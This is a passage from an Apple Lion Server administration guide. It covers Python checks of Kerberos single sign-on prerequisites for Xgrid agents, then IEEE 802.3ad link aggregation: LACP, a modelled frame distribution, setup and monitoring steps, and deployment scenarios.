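   1 hostname.apple.com@XGRIDTEST.APPLE.COM
   1 hostname.apple.com@XGRIDTEST.APPLE.COM
"""

KERBEROS_CONF = """\
# WARNING This file is automatically created, if you wish to make changes
# delete the next two lines
[libdefaults]
    default_realm = XGRIDTEST.APPLE.COM
[realms]
    XGRIDTEST.APPLE.COM = {
        kdc = xgridtest.apple.com
        admin_server = xgridtest.apple.com
    }
"""


def keytab_principals(klist_text: str) -> List[str]:
    """Principals listed by `klist -k`, in order (KVNO column dropped)."""
    found = []
    for line in klist_text.splitlines():
        m = re.match(r"\s*\d+\s+(\S+@\S+)\s*$", line)
        if m:
            found.append(m.group(1))
    return found


def default_realm(conf_text: str) -> str:
    """default_realm from the [libdefaults] section, or '' if not set."""
    section = None
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "libdefaults" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key == "default_realm":
                return value
    return ""


def sso_prerequisites(hostname: str, controller_realm: str,
                      klist_text: str, conf_text: str) -> Dict[str, bool]:
    """Agent-side checks from the list above. The KDC-side check (kadmin
    get_principal) needs access to the KDC and is not modelled here."""
    expected = f"{hostname}@{controller_realm}"
    return {
        "host_principal_in_keytab": expected in keytab_principals(klist_text),
        "controller_realm_is_default": default_realm(conf_text) == controller_realm,
    }
```

On a real agent, feed it the output of sudo klist -k and the contents of /Library/Preferences/edu.mit.Kerberos; any False result points at the prerequisite to fix before expecting SSO to work.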

Link aggregation

About link aggregation


Although not common, the failure of a switch, cable, or network interface card can cause your server to become unavailable. To eliminate these single points of failure, you can use link aggregation or trunking. This technology, also known as IEEE 802.3ad, is built into Lion Server.

Link aggregation allows you to aggregate or combine multiple physical links connecting your Mac to a link aggregation device (a switch or another Mac) into a single logical link. The result is a fault-tolerant link with a bandwidth equal to the sum of the bandwidths of the physical links.

For example, you can set up an Xserve with four 1-Gbit/s ports (en1, en2, en3, and en4) and use the Network pane of System Preferences to create a link aggregate port configuration (bond0) that combines en1, en2, en3, and en4 into one logical link. The resulting logical link has a bandwidth of 4 Gbit/s. This link also provides fault tolerance. If a physical link fails, your Xserve's bandwidth shrinks, but the Xserve can still service requests as long as not all physical links fail at once.

Link aggregation also allows you to take advantage of existing or inexpensive hardware to increase the bandwidth of your server. For example, you can form a link aggregate from a combination of multiple 100-Mbit/s links or 1-Gbit/s links.


About the Link Aggregation Control Protocol (LACP)


IEEE 802.3ad Link Aggregation defines a protocol called Link Aggregation Control Protocol (LACP) that is used by Lion Server to aggregate (combine) multiple ports into a link aggregate (a virtual port) that can be used for TCP and UDP connections. When you define a link aggregate, the nodes on each side of the aggregate (for example, a computer and a switch) use LACP over each physical link to:
• Determine whether the link can be aggregated
• Maintain and monitor the aggregation

If a node doesn't receive LACP packets from its peer (the other node in the aggregate) regularly, it assumes the peer is no longer active and removes the port from the aggregate.

In addition to LACP, Lion Server uses a frame distribution algorithm to map a conversation to a specific port. This algorithm sends packets to the system on the other end of the aggregate only if packet reception is enabled. In other words, the algorithm won't send packets if the other system isn't listening. Mapping a conversation to a specific port guarantees that packet reordering does not occur.
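As an added illustration (not from the manual, and not Apple's actual distributor), the following Python models the conversation-to-port mapping the paragraph describes: a flow hash keeps every frame of one conversation on one active link, so frames of that flow cannot reorder across links, and a link that LACP drops from the aggregate simply falls out of the mapping. The interface names follow the Xserve example above; the conversation key (address and port pairs) is an assumption of this model.

```python
# Added example (not from the Apple manual, not Apple's real distributor):
# a simplified model of 802.3ad frame distribution. Each conversation is
# hashed to one active physical link, so a flow's frames stay in order;
# a link removed by LACP drops out of the mapping and the remaining links
# carry its flows. Port names follow the manual's Xserve example.
import hashlib
from typing import List, Tuple

Conversation = Tuple[str, str, int, int]  # (src_ip, dst_ip, src_port, dst_port)


class LinkAggregate:
    def __init__(self, ports: List[str]):
        self.ports = list(ports)          # physical links configured in bond0
        self.active = set(ports)          # links whose LACP peer is still alive

    def link_down(self, port: str) -> None:
        """No LACP packets from the peer on this link: remove it."""
        self.active.discard(port)

    def link_up(self, port: str) -> None:
        """Peer is back; the link rejoins the aggregate."""
        self.active.add(port)

    def active_ports(self) -> List[str]:
        return [p for p in self.ports if p in self.active]

    def select_port(self, conv: Conversation) -> str:
        """Deterministic mapping: same conversation -> same active port."""
        active = self.active_ports()
        if not active:
            raise RuntimeError("all physical links of the aggregate are down")
        key = "|".join(map(str, conv)).encode()
        digest = hashlib.sha256(key).digest()
        return active[int.from_bytes(digest[:4], "big") % len(active)]

    def bandwidth_gbit(self, per_link_gbit: float) -> float:
        """Aggregate bandwidth is the sum over the links still active."""
        return per_link_gbit * len(self.active_ports())


def ports_used(agg: LinkAggregate, frames: List[Conversation]) -> List[str]:
    """Port chosen for each frame in order; one flow always yields one port."""
    return [agg.select_port(f) for f in frames]
```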


Set up link aggregation in Lion Server

You create a link aggregate on your computer in the Network pane of System Preferences. To set up your Lion Server for link aggregation, you need a Mac with two or more IEEE 802.3ad-compliant Ethernet ports. In addition, you need at least one IEEE 802.3ad-compliant switch or another Lion Server computer with the same number of ports.

By default, the system gives the link aggregate the interface name bond <num>, where <num> is a number indicating precedence. For example, the first link aggregate is named bond0, the second is bond1, and the third is bond2. The interface name bond <num> assigned by the system is different from the name you give to the link aggregate port configuration. The interface name is for use at the command line, but the port configuration name is for use in the Network pane of System Preferences. For example, if you enter the command ifconfig -a, the output refers to the link aggregate using the interface name and not the port configuration name:

bond0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet6 fe80::2e0:edff:fe08:3ea6 pre

You do not delete or remove a link bond from the Network pane of System Preferences. You remove the bond through the Manage Virtual Interfaces sheet used to create the bond.

1. Log in to the server as an administrative user.
2. Open System Preferences.
3. Click Network.
4. Click the Gear button and choose Manage Virtual Interfaces in the pop-up menu.
5. Click the Add button (+) and select New Link Aggregate in the pop-up menu.
   Note: You only see this option if you have two or more Ethernet interfaces on your system.
6. In the Name field, enter the name of the link aggregate.
7. Select the ports to aggregate from the list.
8. Click Create.
9. Click Done.


Monitor link aggregation status


You can monitor the status of a link aggregate in Lion and Lion Server using the Status pane of the Network pane of System Preferences.

1. Open System Preferences.
2. Click Network.
3. From the list of network interfaces on the left, choose the link aggregate port virtual interface.
4. Click Advanced in the lower right side of the window.
5. Select the Bond Status tab.
   The Sending and Receiving status indicators are color-coded. Green means the link is active (turned on) and connected. Yellow means the link is active but not connected. Red means the link can't send or receive traffic.
   The Status pane displays a list containing a row for each physical link in the link aggregate. For each link, you can view the name of the network interface, its speed, its duplex setting, the status indicators for incoming and outgoing traffic, and an overall assessment of the status.
6. To view more information about a link, click the corresponding entry in the list.


Link aggregation scenarios


Computer to computer

In this scenario, you connect the servers directly using the physical links of the link aggregate. This allows the two servers to communicate at a higher speed without the need for a switch. This configuration is ideal for ensuring back-end redundancy.

Computer to switch

In this scenario, you connect your server to a switch configured for 802.3ad link aggregation. The switch should have bandwidth for handling incoming traffic equal to or greater than that of the link aggregate (logical link) you define on your server. For example, if you create an aggregate of four 1-Gbit/s links, use a switch that can handle incoming traffic (from clients) at 4 Gbit/s or more. Otherwise, the increased bandwidth advantage of the link aggregate won't be fully realized.

Note: For information about how to configure your switch for 802.3ad link aggregation, see the documentation provided by the switch manufacturer.

Computer to switch-pair

In this scenario, you improve on the computer-to-switch scenario by using two switches to eliminate the switch as a single point of failure. For example, you can connect two links to the master switch and the remaining links to the backup switch. As long as the master switch is active, the backup switch remains inactive. If the master switch fails, the backup switch takes over transparently. Although this scenario adds redundancy that protects the server from becoming unavailable if the switch fails, it results in decreased bandwidth.
